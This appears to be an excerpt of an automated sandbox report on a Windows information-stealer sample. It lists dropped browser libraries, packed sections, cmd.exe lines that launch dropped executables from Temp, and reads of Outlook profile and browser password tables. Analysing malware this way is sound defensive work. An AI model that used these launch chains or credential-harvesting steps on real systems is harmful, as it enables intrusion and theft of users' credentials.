Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 19_2_009E4AD0 19_2_009E4AD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 19_2_00A2763B 19_2_00A2763B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 19_2_00A22BB0 19_2_00A22BB0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 19_2_00A28700 19_2_00A28700
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 19_2_00A2775B 19_2_00A2775B
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CDDCBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CDE94D0 appears 90 times
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.1478037266.000000006D025000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.1472520218.000000006CE32000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.1436568097.0000000001C9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9996903582317073
Source: file.exe Static PE information: Section: ZLIB complexity 0.991943359375
Source: file.exe Static PE information: Section: ZLIB complexity 0.989990234375
Source: JDGCFBAFBF.exe.0.dr Static PE information: Section: ZLIB complexity 0.9982656676912568
Source: JDGCFBAFBF.exe.0.dr Static PE information: Section: rxceoony ZLIB complexity 0.9944744874886946
Source: amadka[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9982656676912568
Source: amadka[1].exe.0.dr Static PE information: Section: rxceoony ZLIB complexity 0.9944744874886946
Source: explorti.exe.17.dr Static PE information: Section: ZLIB complexity 0.9982656676912568
Source: explorti.exe.17.dr Static PE information: Section: rxceoony ZLIB complexity 0.9944744874886946
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@16/28@0/3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CE07030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6CE07030
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\freebl3[1].dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.1470896959.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1456687731.000000001D4FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1477690456.000000006CFDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.1470896959.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1456687731.000000001D4FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1477690456.000000006CFDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.1470896959.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1456687731.000000001D4FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1477690456.000000006CFDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.1470896959.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1456687731.000000001D4FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1477690456.000000006CFDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.1470896959.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1456687731.000000001D4FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1477690456.000000006CFDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.1470896959.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1456687731.000000001D4FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.1470896959.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1456687731.000000001D4FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1477690456.000000006CFDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1318243031.0000000023466000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1299446550.0000000023474000.00000004.00000020.00020000.00000000.sdmp, CAFHIJDHDGDBFHIEHDGI.0.dr, JEHDHIEGIIIDHIDHDHJJ.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.1470896959.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1456687731.000000001D4FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.1470896959.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1456687731.000000001D4FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe Virustotal: Detection: 45%
Source: JDGCFBAFBF.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HIJJDGDHDG.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe "C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe"
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user~1\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user~1\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user~1\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user~1\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HIJJDGDHDG.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe "C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user~1\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: duser.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.ui.immersive.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uianimation.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static file information: File size 2464256 > 1048576
Source: file.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x216600
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1472235456.000000006CE1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1477690456.000000006CFDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.1477690456.000000006CFDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
